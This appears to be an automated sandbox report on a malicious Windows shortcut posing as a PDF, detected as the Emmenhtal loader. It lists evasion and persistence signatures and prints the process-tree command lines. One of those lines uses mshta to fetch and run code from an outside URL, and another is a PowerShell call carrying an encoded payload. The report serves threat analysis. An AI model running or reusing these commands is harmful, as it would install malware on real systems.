Edit tour
Windows
Analysis Report
HateSpeech2024_Summary.pdf.lnk.bin.lnk
Overview
General Information
Detection
Emmenhtal Loader, MalLnk
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emmenhtal Loader
Yara detected malicious lnk
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Drops VBS files to the startup folder
Found PHP interpreter
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- WMIC.exe (PID: 7560 cmdline:
"C:\Window s\System32 \Wbem\wmic .exe" proc ess call c reate "pow ershell -w 1 powersh ell -Comma nd ('ms' + 'hta' + ' .exe ' + ' https://my filebuilde rs.com/sam m')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 7568 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7628 cmdline:
powershell -w 1 powe rshell -Co mmand ('ms ' + 'hta' + '.exe ' + 'https:/ /myfilebui lders.com/ samm') MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7636 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7788 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " mshta.exe https://my filebuilde rs.com/sam m" MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 7872 cmdline:
"C:\Window s\system32 \mshta.exe " https:// myfilebuil ders.com/s amm MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 8032 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop $dd g = 'CC0D3 2DBB8F2AEA AAD3672833 09458E20D1 3E54AE9F93 C26DBBAD73 293BD50A36 D9574E1A9F CCBBE98A49 FC7AA50C3C 051F3CBAE9 B99771F9B3 471A8B7406 647B457106 56B9560F81 6F99C52E5C D056E94BB3 43C78DECD9 12750ECF5C 120A3C6120 F92F9AB407 C779692B2B 801886D4C1 933853B818 B2F4ACBF25 4531544A97 C461534F89 89BDBE763C 47BD13A502 7B3175BDB8 C0BA73400B 08CB34FF33 83856710CB 6019243D1C 36B39D01C9 442DBEB895 28D7494446 14EA6F3A12 5CFDB0B5CB 39EA903AD0 87683829FA E488C94736 BC882DFA6F 1B5BADE602 DC13EA4A71 F59C0C555E 4AA6CC495A 964CEE240B AC2F3D429A A98692B0BF 989429E291 DCF520A316 7A6D7D554A 48ED1EC98E 1F71AA7586 70750C9840 4FB140B70E 6F8CE88015 D69E8D0F3F CF7F737F07 4F810905C0 DD5FD37726 F325B89CC0 2C3B0CD71D D28A101A90 80999F615A 7AF33942A1 FEAF9033FF B3CB02D88C 83CEA4BEB1 3D36CCCDE5 36D2D4EA38 EA00E49283 8E3E78EE9C 0CA9DBC405 A5C6F04999 9533FD9F5F A740480173 4E83789785 46AAF5D849 56D74F1C45 1D373B86F3 488593922F 15AEE13BA0 2471A9C112 CEDF4833B3 F0638A4A8C ECD1D52E97 14EA9EDEB5 E32944EB33 FE52FB8A4B 556B1DA618 3E48183ACE 760AE01310 141F680BF3 D33446801F C2BFD3000C 1BDD51A6E8 F30AA8A9B5 C8BFBB555A 5C04AC12A8 1509772CE1 27CB8598C5 25EBA2A091 166AA250CC C96785ABD7 2973ECED69 24E22C09BD 25C8684520 73029B96D7 C754E3D74F DF15E08C2A 0F4C53F93F 39EC3F0FD9 65A188FDF1 3D042BBC47 CF96138A70 FAB9162E32 734D3C137C C3A4D27DB5 363F9FA5F5 9ECAC5ADF2 83B806C004 31D7D24079 5F83F85010 F571088B24 6CEEDC36DA DA39641C87 1CCD8E7750 17B5A338D1 D94E045C14 0E05F8F86D B296BFFD09 2C327B31BB 3D19F8C1B5 B5EFBFD546 47ABB292A0 F16D86139B 074238F1AB 2638E0A303 4AC7C00056 A6E988B63A 360B70DCBC DFD1A98A7D E9D02F1760 C98DEFEFD5 5748A81631 DD8336CCBC 8BDB9784FD C8ED2398FA DF660B1349 E919FD6497 D31A84903C 8649BB847B 3734E51D3C 9ABDFA5BBE 03A6CA0E3E C6A9ABB605 4F6EB3DE0B 804173A9DF DFD85C03FB B3DD4CD715 2D30D13AF8 0E4BC2D9D5 61DB494C44 5384AF14A7 1AF67A3F25 2F2BAB0EB8 A399A9F3DE 478EE0920E 4F717E63A1 95E6394FFD 001BEFEED3 7566A40C55 DC5CF48EF4 2822AD3876 834FF7F2C4 1AA52134D4 1CE152176D 5FBC298F91 AF4E5C2ADB 1486720693 646536D830 8BF068787A EE0EED2687 32FA76B22C 73A43EEC2E 677B595D57 5F1EDD71FA EC18238660 E9D88409FA 932407116B B516B6340B 888E6FF5C5 E303826F79 3F4E87135C 2D9D20886E B5FCFC42C0 D9603B67C1 3BBE824880 90447CE2D4 06BCE4F71F 8DED1277FB 46A3F2E9FE B147880DEF 6AD74481A9 5C5A94D480 FA6742D967 332B49570E 903748A0BC 475D54F8A4 C548412C4A E30767A66A 97B5BCFEE2 DCB02BD3B1 1FA82EA1D2 14EA652058 0B2DDF1FAC DAD83B1921 E52658D688 B42F0DC0F1 63134922A3 08D66702D2 E0ABFC978E CCE276FD64 23CFF201D4 169303D1FE E518BF422F DA896E2625 653444DDB5 24D1779473 C3EF10919F 817A39FEBE 05CE776ACD 3EEB5F6529